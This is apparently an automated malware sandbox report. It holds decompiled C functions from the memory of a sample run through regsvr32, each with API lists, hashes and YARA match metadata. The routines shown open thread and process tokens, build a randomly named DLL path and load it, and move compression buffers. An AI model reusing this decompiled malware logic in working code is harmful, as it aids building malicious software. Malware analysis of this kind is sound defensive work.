						 *_t76 =  *(_t272 + 0x6c) + _t225;
						__eflags =  *_t76;
						_t78 = _t272 + 0x6c; // 0xa1ec8b55
						_t184 =  *_t78;
						_t79 = _t272 + 0x2c; // 0x8df075ff
						_t239 =  *_t79;
					} else {
						 *(_t272 + 0x16b0) = 2;
						_t61 = _t272 + 0x38; // 0xf47d8bff
						memcpy( *_t61,  *_t142 - _t224, _t224);
						_t62 = _t272 + 0x2c; // 0x8df075ff
						_t184 =  *_t62;
						_t273 = _t273 + 0xc;
						_t225 = _a4;
						_t239 = _t184;
						 *(_t272 + 0x6c) = _t184;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					_t254 = _t184;
                                                                                                                                                                                              					 *(_t272 + 0x5c) = _t184;
                                                                                                                                                                                              					_t81 = _t272 + 0x16b4; // 0xed7505f9
                                                                                                                                                                                              					_t185 =  *_t81;
                                                                                                                                                                                              					_t240 = _t239 - _t185;
                                                                                                                                                                                              					_t241 =  <=  ? _t225 : _t240;
                                                                                                                                                                                              					_t242 = ( <=  ? _t225 : _t240) + _t185;
                                                                                                                                                                                              					 *((intOrPtr*)(_t272 + 0x16b4)) = ( <=  ? _t225 : _t240) + _t185;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				if( *(_t272 + 0x16c0) < _t254) {
                                                                                                                                                                                              					 *(_t272 + 0x16c0) = _t254;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				if(_t269 == 0) {
                                                                                                                                                                                              					_t218 = _a8;
                                                                                                                                                                                              					__eflags = _t218;
                                                                                                                                                                                              					if(_t218 == 0) {
                                                                                                                                                                                              						L34:
                                                                                                                                                                                              						_t89 = _t272 + 0x3c; // 0x830cc483
                                                                                                                                                                                              						_t219 =  *_t272;
                                                                                                                                                                                              						_t145 =  *_t89 - _t254 - 1;
                                                                                                                                                                                              						_a4 =  *_t272;
                                                                                                                                                                                              						_t234 = _t254;
                                                                                                                                                                                              						_v16 = _t145;
                                                                                                                                                                                              						_v8 = _t254;
                                                                                                                                                                                              						__eflags =  *((intOrPtr*)(_t219 + 4)) - _t145;
                                                                                                                                                                                              						if( *((intOrPtr*)(_t219 + 4)) > _t145) {
                                                                                                                                                                                              							_v8 = _t254;
                                                                                                                                                                                              							_t95 = _t272 + 0x5c; // 0xbde85000
                                                                                                                                                                                              							_a4 = _t219;
                                                                                                                                                                                              							_t234 = _t254;
                                                                                                                                                                                              							_t97 = _t272 + 0x2c; // 0x8df075ff
                                                                                                                                                                                              							__eflags =  *_t95 -  *_t97;
                                                                                                                                                                                              							if( *_t95 >=  *_t97) {
                                                                                                                                                                                              								_t98 = _t272 + 0x2c; // 0x8df075ff
                                                                                                                                                                                              								_t167 =  *_t98;
                                                                                                                                                                                              								_t259 = _t254 - _t167;
                                                                                                                                                                                              								_t99 = _t272 + 0x38; // 0xf47d8bff
                                                                                                                                                                                              								 *(_t272 + 0x5c) =  *(_t272 + 0x5c) - _t167;
                                                                                                                                                                                              								 *(_t272 + 0x6c) = _t259;
                                                                                                                                                                                              								memcpy( *_t99, _t167 +  *_t99, _t259);
                                                                                                                                                                                              								_t103 = _t272 + 0x16b0; // 0x8341ffff
                                                                                                                                                                                              								_t170 =  *_t103;
                                                                                                                                                                                              								_t273 = _t273 + 0xc;
                                                                                                                                                                                              								__eflags = _t170 - 2;
                                                                                                                                                                                              								if(_t170 < 2) {
                                                                                                                                                                                              									_t172 = _t170 + 1;
                                                                                                                                                                                              									__eflags = _t172;
                                                                                                                                                                                              									 *(_t272 + 0x16b0) = _t172;
                                                                                                                                                                                              								}
                                                                                                                                                                                              								_t106 = _t272 + 0x2c; // 0x8df075ff
                                                                                                                                                                                              								_t145 = _v16 +  *_t106;
                                                                                                                                                                                              								__eflags = _t145;
                                                                                                                                                                                              								_a4 =  *_t272;
                                                                                                                                                                                              								_t108 = _t272 + 0x6c; // 0xa1ec8b55
                                                                                                                                                                                              								_t234 =  *_t108;
                                                                                                                                                                                              								_v8 = _t234;
                                                                                                                                                                                              							}
                                                                                                                                                                                              						}
                                                                                                                                                                                              						_t255 = _a4;
                                                                                                                                                                                              						_t220 =  *((intOrPtr*)(_a4 + 4));
                                                                                                                                                                                              						__eflags = _t145 - _t220;
                                                                                                                                                                                              						_t221 =  <=  ? _t145 : _t220;
                                                                                                                                                                                              						_t146 = _t221;
                                                                                                                                                                                              						_a4 = _t221;
                                                                                                                                                                                              						_t222 = _a8;
                                                                                                                                                                                              						__eflags = _t146;
                                                                                                                                                                                              						if(_t146 != 0) {
                                                                                                                                                                                              							_t114 = _t272 + 0x38; // 0xf47d8bff
                                                                                                                                                                                              							E04B05FC0(_t255,  *_t114 + _v8, _t146);
                                                                                                                                                                                              							_t273 = _t273 + 0xc;
                                                                                                                                                                                              							_t117 = _t272 + 0x6c;
                                                                                                                                                                                              							 *_t117 =  *(_t272 + 0x6c) + _a4;
                                                                                                                                                                                              							__eflags =  *_t117;
                                                                                                                                                                                              							_t119 = _t272 + 0x6c; // 0xa1ec8b55
                                                                                                                                                                                              							_t234 =  *_t119;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						__eflags =  *(_t272 + 0x16c0) - _t234;
                                                                                                                                                                                              						if( *(_t272 + 0x16c0) < _t234) {
                                                                                                                                                                                              							 *(_t272 + 0x16c0) = _t234;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						_t122 = _t272 + 0x16bc; // 0xfed1e900
                                                                                                                                                                                              						_t123 = _t272 + 0xc; // 0x452bf84d
                                                                                                                                                                                              						_t257 =  *_t123 - ( *_t122 + 0x2a >> 3);
                                                                                                                                                                                              						__eflags = _t257 - 0xffff;
                                                                                                                                                                                              						_t258 =  >  ? 0xffff : _t257;
                                                                                                                                                                                              						_t124 = _t272 + 0x2c; // 0x8df075ff
                                                                                                                                                                                              						_t151 =  *_t124;
                                                                                                                                                                                              						_t125 = _t272 + 0x5c; // 0xbde85000
                                                                                                                                                                                              						_t235 = _t234 -  *_t125;
                                                                                                                                                                                              						__eflags = _t258 - _t151;
                                                                                                                                                                                              						_t152 =  <=  ? _t258 : _t151;
                                                                                                                                                                                              						__eflags = _t235 - ( <=  ? _t258 : _t151);
                                                                                                                                                                                              						if(_t235 >= ( <=  ? _t258 : _t151)) {
                                                                                                                                                                                              							L49:
                                                                                                                                                                                              							__eflags = _t235 - _t258;
                                                                                                                                                                                              							_t154 =  >  ? _t258 : _t235;
                                                                                                                                                                                              							_a4 =  >  ? _t258 : _t235;
                                                                                                                                                                                              							__eflags = _t222 - 4;
                                                                                                                                                                                              							if(_t222 != 4) {
                                                                                                                                                                                              								L53:
                                                                                                                                                                                              								_t269 = 0;
                                                                                                                                                                                              								__eflags = 0;
                                                                                                                                                                                              							} else {
                                                                                                                                                                                              								_t161 =  *_t272;
                                                                                                                                                                                              								__eflags =  *(_t161 + 4);
                                                                                                                                                                                              								_t154 = _a4;
                                                                                                                                                                                              								if( *(_t161 + 4) != 0) {
                                                                                                                                                                                              									goto L53;
                                                                                                                                                                                              								} else {
                                                                                                                                                                                              									__eflags = _t154 - _t235;
                                                                                                                                                                                              									if(_t154 != _t235) {
                                                                                                                                                                                              										goto L53;
                                                                                                                                                                                              									} else {
                                                                                                                                                                                              										_t269 = _t222 - 3;
                                                                                                                                                                                              									}
                                                                                                                                                                                              								}
                                                                                                                                                                                              							}
                                                                                                                                                                                              							_t131 = _t272 + 0x38; // 0xf47d8bff
                                                                                                                                                                                              							_t132 = _t272 + 0x5c; // 0xbde85000
                                                                                                                                                                                              							E04B07120(_t272, _t272,  *_t131 +  *_t132, _t154, _t269);
                                                                                                                                                                                              							_t134 = _t272 + 0x5c;
                                                                                                                                                                                              							 *_t134 =  *(_t272 + 0x5c) + _a4;
                                                                                                                                                                                              							__eflags =  *_t134;
                                                                                                                                                                                              							E04B05E80( *_t134,  *_t272);
                                                                                                                                                                                              						} else {
                                                                                                                                                                                              							__eflags = _t235;
                                                                                                                                                                                              							if(_t235 != 0) {
                                                                                                                                                                                              								L46:
                                                                                                                                                                                              								__eflags = _t222;
                                                                                                                                                                                              								if(_t222 != 0) {
                                                                                                                                                                                              									_t162 =  *_t272;
                                                                                                                                                                                              									__eflags =  *(_t162 + 4);
                                                                                                                                                                                              									if( *(_t162 + 4) == 0) {
                                                                                                                                                                                              										__eflags = _t235 - _t258;
                                                                                                                                                                                              										if(_t235 <= _t258) {
                                                                                                                                                                                              											goto L49;
                                                                                                                                                                                              										}
                                                                                                                                                                                              									}
                                                                                                                                                                                              								}
                                                                                                                                                                                              							} else {
                                                                                                                                                                                              								__eflags = _t222 - 4;
                                                                                                                                                                                              								if(_t222 == 4) {
                                                                                                                                                                                              									goto L46;
                                                                                                                                                                                              								}
                                                                                                                                                                                              							}
                                                                                                                                                                                              						}
                                                                                                                                                                                              						asm("sbb edi, edi");
                                                                                                                                                                                              						_t271 =  ~_t269 & 0x00000002;
                                                                                                                                                                                              						__eflags = _t271;
                                                                                                                                                                                              						return _t271;
                                                                                                                                                                                              					} else {
                                                                                                                                                                                              						__eflags = _t218 - 4;
                                                                                                                                                                                              						if(_t218 == 4) {
                                                                                                                                                                                              							goto L34;
                                                                                                                                                                                              						} else {
                                                                                                                                                                                              							_t173 =  *_t272;
                                                                                                                                                                                              							__eflags =  *(_t173 + 4);
                                                                                                                                                                                              							if( *(_t173 + 4) != 0) {
                                                                                                                                                                                              								goto L34;
                                                                                                                                                                                              							} else {
                                                                                                                                                                                              								_t88 = _t272 + 0x5c; // 0xbde85000
                                                                                                                                                                                              								__eflags = _t254 -  *_t88;
                                                                                                                                                                                              								if(_t254 !=  *_t88) {
                                                                                                                                                                                              									goto L34;
                                                                                                                                                                                              								} else {
                                                                                                                                                                                              									return 1;
                                                                                                                                                                                              								}
                                                                                                                                                                                              							}
                                                                                                                                                                                              						}
                                                                                                                                                                                              					}
                                                                                                                                                                                              				} else {
                                                                                                                                                                                              					return 3;
                                                                                                                                                                                              				}
                                                                                                                                                                                              			}






















































                                                                                                                                                                                              0x04b042ed
                                                                                                                                                                                              0x04b042f0
                                                                                                                                                                                              0x04b042f0
                                                                                                                                                                                              0x04b04271
                                                                                                                                                                                              0x04b04271
                                                                                                                                                                                              0x04b04281
                                                                                                                                                                                              0x04b04284
                                                                                                                                                                                              0x04b04289
                                                                                                                                                                                              0x04b04289
                                                                                                                                                                                              0x04b0428c
                                                                                                                                                                                              0x04b0428f
                                                                                                                                                                                              0x04b04292
                                                                                                                                                                                              0x04b04294
                                                                                                                                                                                              0x04b04294
                                                                                                                                                                                              0x04b042f3
                                                                                                                                                                                              0x04b042f5
                                                                                                                                                                                              0x04b042f8
                                                                                                                                                                                              0x04b042f8
                                                                                                                                                                                              0x04b042fe
                                                                                                                                                                                              0x04b04302
                                                                                                                                                                                              0x04b04305
                                                                                                                                                                                              0x04b04307
                                                                                                                                                                                              0x04b04307
                                                                                                                                                                                              0x04b04318
                                                                                                                                                                                              0x04b0431a
                                                                                                                                                                                              0x04b0431a
                                                                                                                                                                                              0x04b04322
                                                                                                                                                                                              0x04b04330
                                                                                                                                                                                              0x04b04333
                                                                                                                                                                                              0x04b04335
                                                                                                                                                                                              0x04b04355
                                                                                                                                                                                              0x04b04355
                                                                                                                                                                                              0x04b04358
                                                                                                                                                                                              0x04b0435e
                                                                                                                                                                                              0x04b0435f
                                                                                                                                                                                              0x04b04362
                                                                                                                                                                                              0x04b04364
                                                                                                                                                                                              0x04b04367
                                                                                                                                                                                              0x04b0436a
                                                                                                                                                                                              0x04b0436d
                                                                                                                                                                                              0x04b04371
                                                                                                                                                                                              0x04b04374
                                                                                                                                                                                              0x04b04377
                                                                                                                                                                                              0x04b0437a
                                                                                                                                                                                              0x04b0437c
                                                                                                                                                                                              0x04b0437c
                                                                                                                                                                                              0x04b0437f
                                                                                                                                                                                              0x04b04381
                                                                                                                                                                                              0x04b04381
                                                                                                                                                                                              0x04b04384
                                                                                                                                                                                              0x04b04386
                                                                                                                                                                                              0x04b04389
                                                                                                                                                                                              0x04b04391
                                                                                                                                                                                              0x04b04394
                                                                                                                                                                                              0x04b04399
                                                                                                                                                                                              0x04b04399
                                                                                                                                                                                              0x04b0439f
                                                                                                                                                                                              0x04b043a2
                                                                                                                                                                                              0x04b043a5
                                                                                                                                                                                              0x04b043a7
                                                                                                                                                                                              0x04b043a7
                                                                                                                                                                                              0x04b043a8
                                                                                                                                                                                              0x04b043a8
                                                                                                                                                                                              0x04b043b3
                                                                                                                                                                                              0x04b043b3
                                                                                                                                                                                              0x04b043b3
                                                                                                                                                                                              0x04b043b6
                                                                                                                                                                                              0x04b043b9
                                                                                                                                                                                              0x04b043b9
                                                                                                                                                                                              0x04b043bc
                                                                                                                                                                                              0x04b043bc
                                                                                                                                                                                              0x04b0437f
                                                                                                                                                                                              0x04b043bf
                                                                                                                                                                                              0x04b043c2
                                                                                                                                                                                              0x04b043c5
                                                                                                                                                                                              0x04b043c7
                                                                                                                                                                                              0x04b043ca
                                                                                                                                                                                              0x04b043cc
                                                                                                                                                                                              0x04b043cf
                                                                                                                                                                                              0x04b043d2
                                                                                                                                                                                              0x04b043d4
                                                                                                                                                                                              0x04b043d7
                                                                                                                                                                                              0x04b043df
                                                                                                                                                                                              0x04b043e7
                                                                                                                                                                                              0x04b043ea
                                                                                                                                                                                              0x04b043ea
                                                                                                                                                                                              0x04b043ea
                                                                                                                                                                                              0x04b043ed
                                                                                                                                                                                              0x04b043ed
                                                                                                                                                                                              0x04b043ed
                                                                                                                                                                                              0x04b043f0
                                                                                                                                                                                              0x04b043f6
                                                                                                                                                                                              0x04b043f8
                                                                                                                                                                                              0x04b043f8
                                                                                                                                                                                              0x04b043fe
                                                                                                                                                                                              0x04b04404
                                                                                                                                                                                              0x04b0440d
                                                                                                                                                                                              0x04b04414
                                                                                                                                                                                              0x04b04416
                                                                                                                                                                                              0x04b04419
                                                                                                                                                                                              0x04b04419
                                                                                                                                                                                              0x04b0441c
                                                                                                                                                                                              0x04b0441c
                                                                                                                                                                                              0x04b0441f
                                                                                                                                                                                              0x04b04421
                                                                                                                                                                                              0x04b04424
                                                                                                                                                                                              0x04b04426
                                                                                                                                                                                              0x04b04441
                                                                                                                                                                                              0x04b04441
                                                                                                                                                                                              0x04b04445
                                                                                                                                                                                              0x04b04448
                                                                                                                                                                                              0x04b0444b
                                                                                                                                                                                              0x04b0444e
                                                                                                                                                                                              0x04b04464
                                                                                                                                                                                              0x04b04464
                                                                                                                                                                                              0x04b04464
                                                                                                                                                                                              0x04b04450
                                                                                                                                                                                              0x04b04450
                                                                                                                                                                                              0x04b04452
                                                                                                                                                                                              0x04b04456
                                                                                                                                                                                              0x04b04459
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04b0445b
                                                                                                                                                                                              0x04b0445b
                                                                                                                                                                                              0x04b0445d
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04b0445f
                                                                                                                                                                                              0x04b0445f
                                                                                                                                                                                              0x04b0445f
                                                                                                                                                                                              0x04b0445d
                                                                                                                                                                                              0x04b04459
                                                                                                                                                                                              0x04b04468
                                                                                                                                                                                              0x04b0446b
                                                                                                                                                                                              0x04b04470
                                                                                                                                                                                              0x04b0447a
                                                                                                                                                                                              0x04b0447a
                                                                                                                                                                                              0x04b0447a
                                                                                                                                                                                              0x04b0447d
                                                                                                                                                                                              0x04b04428
                                                                                                                                                                                              0x04b04428

                                                                                                                                                                                              APIs
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001D.00000002.677381377.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_29_2_4af0000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: memcpy
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3510742995-0
                                                                                                                                                                                              • Opcode ID: d78685e2831b4aa8f0c5c5e600617b722de4f40544eb307eba323e3ebd37dfb5
                                                                                                                                                                                              • Instruction ID: 7dfbe43e5a9ccba34b83047dddede7a482a9b86a20e275e56cbe1c5b0c2bcd83
                                                                                                                                                                                              • Opcode Fuzzy Hash: d78685e2831b4aa8f0c5c5e600617b722de4f40544eb307eba323e3ebd37dfb5
                                                                                                                                                                                              • Instruction Fuzzy Hash: 76D11271A006009FDB24CF6DC8C0A6ABBE5FF88305B24C9ADE98AC7781D731F9458B51
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                              			E04AFC79E(void* __ecx) {
                                                                                                                                                                                              				void* _v8;
                                                                                                                                                                                              				void* _t10;
                                                                                                                                                                                              				intOrPtr _t13;
                                                                                                                                                                                              
                                                                                                                                                                                              				if(OpenThreadToken(GetCurrentThread(), 8, 0,  &_v8) != 0) {
                                                                                                                                                                                              					L4:
                                                                                                                                                                                              					_t10 = _v8;
                                                                                                                                                                                              				} else {
                                                                                                                                                                                              					if(GetLastError() != 0x3f0) {
                                                                                                                                                                                              						L3:
                                                                                                                                                                                              						_t10 = 0;
                                                                                                                                                                                              					} else {
                                                                                                                                                                                              						_t13 =  *0x4b0f818; // 0x4c2f8b0
                                                                                                                                                                                              						if(OpenProcessToken( *((intOrPtr*)(_t13 + 0x12c))(), 8,  &_v8) != 0) {
                                                                                                                                                                                              							goto L4;
                                                                                                                                                                                              						} else {
                                                                                                                                                                                              							goto L3;
                                                                                                                                                                                              						}
                                                                                                                                                                                              					}
                                                                                                                                                                                              				}
                                                                                                                                                                                              				return _t10;
                                                                                                                                                                                              			}







                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetCurrentThread.KERNEL32 ref: 04AFC7B1
                                                                                                                                                                                              • OpenThreadToken.ADVAPI32(00000000,?,?,04AFC8E3,00000000,04AF0000), ref: 04AFC7B8
                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,04AFC8E3,00000000,04AF0000), ref: 04AFC7BF
                                                                                                                                                                                              • OpenProcessToken.ADVAPI32(00000000,?,?,04AFC8E3,00000000,04AF0000), ref: 04AFC7E4
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001D.00000002.677381377.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_29_2_4af0000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: OpenThreadToken$CurrentErrorLastProcess
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1515895013-0
                                                                                                                                                                                              • Opcode ID: 723a37c08532d3558f390287d33d72742558ae8fcdb42754c23bbb3339245a4d
                                                                                                                                                                                              • Instruction ID: 462a48fdbbcd1a9607277f46a22703bf41b736d565515e001d6090542b3400be
                                                                                                                                                                                              • Opcode Fuzzy Hash: 723a37c08532d3558f390287d33d72742558ae8fcdb42754c23bbb3339245a4d
                                                                                                                                                                                              • Instruction Fuzzy Hash: 6DF03AB2700609EBDB609FE5DC49BAA77FCFB09251F004461F602D3040E764FE408BA0
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 89%
                                                                                                                                                                                              			E04AFD218(void* __ebx, void* __edx, void* __edi, void* __esi) {
                                                                                                                                                                                              				char _v8;
                                                                                                                                                                                              				char _v12;
                                                                                                                                                                                              				char _v140;
                                                                                                                                                                                              				signed char _t14;
                                                                                                                                                                                              				char _t15;
                                                                                                                                                                                              				intOrPtr _t20;
                                                                                                                                                                                              				void* _t25;
                                                                                                                                                                                              				intOrPtr _t26;
                                                                                                                                                                                              				intOrPtr _t32;
                                                                                                                                                                                              				WCHAR* _t34;
                                                                                                                                                                                              				intOrPtr _t35;
                                                                                                                                                                                              				struct HINSTANCE__* _t37;
                                                                                                                                                                                              				intOrPtr _t38;
                                                                                                                                                                                              				intOrPtr _t46;
                                                                                                                                                                                              				void* _t47;
                                                                                                                                                                                              				intOrPtr _t50;
                                                                                                                                                                                              				void* _t60;
                                                                                                                                                                                              				void* _t61;
                                                                                                                                                                                              				char _t62;
                                                                                                                                                                                              				void* _t65;
                                                                                                                                                                                              				intOrPtr _t66;
                                                                                                                                                                                              				char _t68;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t65 = __esi;
                                                                                                                                                                                              				_t61 = __edi;
                                                                                                                                                                                              				_t47 = __ebx;
                                                                                                                                                                                              				_t50 =  *0x4b0f81c; // 0x4c2fbe8
                                                                                                                                                                                              				_t1 = _t50 + 0x1898; // 0x0
                                                                                                                                                                                              				_t14 =  *_t1;
                                                                                                                                                                                              				if(_t14 == 0x100 ||  *((intOrPtr*)(_t50 + 4)) >= 0xa && (_t14 & 0x00000004) != 0) {
                                                                                                                                                                                              					_t15 = E04AF9DF2(_t50, 0x392);
                                                                                                                                                                                              					_t66 =  *0x4b0f81c; // 0x4c2fbe8
                                                                                                                                                                                              					_t62 = _t15;
                                                                                                                                                                                              					_t67 = _t66 + 0xb0;
                                                                                                                                                                                              					_v8 = _t62;
                                                                                                                                                                                              					E04AF9E51( &_v140, 0x40, L"%08x", E04AFE2C5(_t66 + 0xb0, E04AFA43D(_t66 + 0xb0), 0));
                                                                                                                                                                                              					_t20 =  *0x4b0f81c; // 0x4c2fbe8
                                                                                                                                                                                              					_t7 = _t20 + 0xa8; // 0x1
                                                                                                                                                                                              					asm("sbb eax, eax");
                                                                                                                                                                                              					_t25 = E04AF9DF2(_t67, ( ~( *_t7) & 0x00000a0b) + 0xf8);
                                                                                                                                                                                              					_t26 =  *0x4b0f81c; // 0x4c2fbe8
                                                                                                                                                                                              					_t68 = E04AF9A5A(_t26 + 0x1020);
                                                                                                                                                                                              					_v12 = _t68;
                                                                                                                                                                                              					E04AF8BAF( &_v8);
                                                                                                                                                                                              					_t32 =  *0x4b0f81c; // 0x4c2fbe8
                                                                                                                                                                                              					_t34 = E04AF9A5A(_t32 + 0x122a);
                                                                                                                                                                                              					 *0x4b0f91c = _t34;
                                                                                                                                                                                              					_t35 =  *0x4b0f818; // 0x4c2f8b0
                                                                                                                                                                                              					 *((intOrPtr*)(_t35 + 0x11c))(_t68, _t34, 0, 0x4b0c9a0,  &_v140, ".", L"dll", 0, 0x4b0c9a0, _t25, 0x4b0c9a0, _t62, 0, _t61, _t65, _t47);
                                                                                                                                                                                              					_t37 = LoadLibraryW( *0x4b0f91c);
                                                                                                                                                                                              					 *0x4b0f914 = _t37;
                                                                                                                                                                                              					if(_t37 == 0) {
                                                                                                                                                                                              						_t38 = 0;
                                                                                                                                                                                              					} else {
                                                                                                                                                                                              						_push(_t37);
                                                                                                                                                                                              						_t60 = 0x28;
                                                                                                                                                                                              						_t38 = E04AFF011(0x4b0cb8c, _t60);
                                                                                                                                                                                              					}
                                                                                                                                                                                              					 *0x4b0f918 = _t38;
                                                                                                                                                                                              					E04AF8BF4( &_v12, 0xfffffffe);
                                                                                                                                                                                              					E04AF8D6D( &_v140, 0, 0x80);
                                                                                                                                                                                              					if( *0x4b0f918 != 0) {
                                                                                                                                                                                              						goto L10;
                                                                                                                                                                                              					} else {
                                                                                                                                                                                              						E04AF8BF4(0x4b0f91c, 0xfffffffe);
                                                                                                                                                                                              						goto L8;
                                                                                                                                                                                              					}
                                                                                                                                                                                              				} else {
                                                                                                                                                                                              					L8:
                                                                                                                                                                                              					if( *0x4b0f918 == 0) {
                                                                                                                                                                                              						_t46 =  *0x4b0f850; // 0x4c2f9f0
                                                                                                                                                                                              						 *0x4b0f918 = _t46;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					L10:
                                                                                                                                                                                              					return 1;
                                                                                                                                                                                              				}
                                                                                                                                                                                              			}


























                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001D.00000002.677381377.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_29_2_4af0000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: LibraryLoad
                                                                                                                                                                                              • String ID: %08x$dll
                                                                                                                                                                                              • API String ID: 1029625771-2963171978
                                                                                                                                                                                              • Opcode ID: dc911b79b73d98a0e202e6ada5715cfb8f8b08c7fc552e3922d3479e1fff52f8
                                                                                                                                                                                              • Instruction ID: 0da5de063b9d3ba510b5898ff3a10f17f6cdb82caac78da8643f1312852785c3
                                                                                                                                                                                              • Opcode Fuzzy Hash: dc911b79b73d98a0e202e6ada5715cfb8f8b08c7fc552e3922d3479e1fff52f8
                                                                                                                                                                                              • Instruction Fuzzy Hash: A031A3B2740204AFE720ABA8ED44FEA37ACEB65319F108176F205D7190DB78ED858764
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 47%
                                                                                                                                                                                              			E04B03674(void* __eflags, long long __fp0, intOrPtr _a4, intOrPtr _a8, signed int _a12) {
                                                                                                                                                                                              				char _v5;
                                                                                                                                                                                              				long long _v12;
                                                                                                                                                                                              				short _v20;
                                                                                                                                                                                              				signed int _t15;
                                                                                                                                                                                              				void* _t16;
                                                                                                                                                                                              				signed int _t22;
                                                                                                                                                                                              				char _t25;
                                                                                                                                                                                              				void* _t26;
                                                                                                                                                                                              				signed int _t28;
                                                                                                                                                                                              				intOrPtr _t29;
                                                                                                                                                                                              				void* _t31;
                                                                                                                                                                                              				char** _t32;
                                                                                                                                                                                              				long long _t40;
                                                                                                                                                                                              				long long _t41;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t40 = __fp0;
                                                                                                                                                                                              				_t15 = E04B0358D(_a4);
                                                                                                                                                                                              				 *_t32 = "msxml3.dll";
                                                                                                                                                                                              				_t28 = _t15 & 0x0fffffff;
                                                                                                                                                                                              				_t16 = E04AFA43D();
                                                                                                                                                                                              				_t26 = 0xf;
                                                                                                                                                                                              				_t25 = 0;
                                                                                                                                                                                              				_v5 = 0;
                                                                                                                                                                                              				if(_t16 > _t26) {
                                                                                                                                                                                              					L2:
                                                                                                                                                                                              					_t3 = _t25 + 0x41; // 0x41
                                                                                                                                                                                              					 *((char*)(_t31 + _t25 - 0x10)) = _t3;
                                                                                                                                                                                              					_t25 = _t25 + 1;
                                                                                                                                                                                              				} else {
                                                                                                                                                                                              					_t26 = _t16;
                                                                                                                                                                                              					if(_t26 != 0) {
                                                                                                                                                                                              						do {
                                                                                                                                                                                              							goto L2;
                                                                                                                                                                                              						} while (_t25 < _t26);
                                                                                                                                                                                              					}
                                                                                                                                                                                              				}
                                                                                                                                                                                              				lstrlenW( &_v20);
                                                                                                                                                                                              				_t29 = _a8;
                                                                                                                                                                                              				_t22 = _a12 - _t29 + 1;
                                                                                                                                                                                              				_a12 = _t22;
                                                                                                                                                                                              				asm("fild dword [ebp+0x10]");
                                                                                                                                                                                              				if(_t22 < 0) {
                                                                                                                                                                                              					_t40 = _t40 +  *0x4b0cf58;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_a12 = _t28;
                                                                                                                                                                                              				_v12 = _t40;
                                                                                                                                                                                              				_t41 = _v12;
                                                                                                                                                                                              				asm("fild dword [ebp+0x10]");
                                                                                                                                                                                              				if(_t28 < 0) {
                                                                                                                                                                                              					_t41 = _t41 +  *0x4b0cf58;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_v12 = _t41;
                                                                                                                                                                                              				asm("fmulp st1, st0");
                                                                                                                                                                                              				L04B08935();
                                                                                                                                                                                              				return _t29 - _t22;
                                                                                                                                                                                              			}


















                                                                                                                                                                                              APIs
                                                                                                                                                                                              • lstrlenW.KERNEL32(?,000000B0,000000B0,?,00000000,000000B0,00000228), ref: 04B036BB
                                                                                                                                                                                              • _ftol2_sse.MSVCRT ref: 04B036FE
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001D.00000002.677381377.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_29_2_4af0000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: _ftol2_sselstrlen
                                                                                                                                                                                              • String ID: msxml3.dll
                                                                                                                                                                                              • API String ID: 1292649733-2158035192
                                                                                                                                                                                              • Opcode ID: b7fb38b830989def44c4822986c131b3407c92ffc9477df345bd9663d548a564
                                                                                                                                                                                              • Instruction ID: 028a0402d8b8a3aa397dd5fb6c55157dae048c590d4f9f2d4c10db290f73a216
                                                                                                                                                                                              • Opcode Fuzzy Hash: b7fb38b830989def44c4822986c131b3407c92ffc9477df345bd9663d548a564
                                                                                                                                                                                              • Instruction Fuzzy Hash: A611E532A046499BCF00AFA8E80809E7FB5FFA4351B26C6D9DC55932C1EB31E5A58791
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              C-Code - Quality: 50%
                                                                                                                                                                                              			E02F9370B(signed int __eax, void* __ecx, intOrPtr _a4) {
                                                                                                                                                                                              				intOrPtr* _v8;
                                                                                                                                                                                              				signed int* _v12;
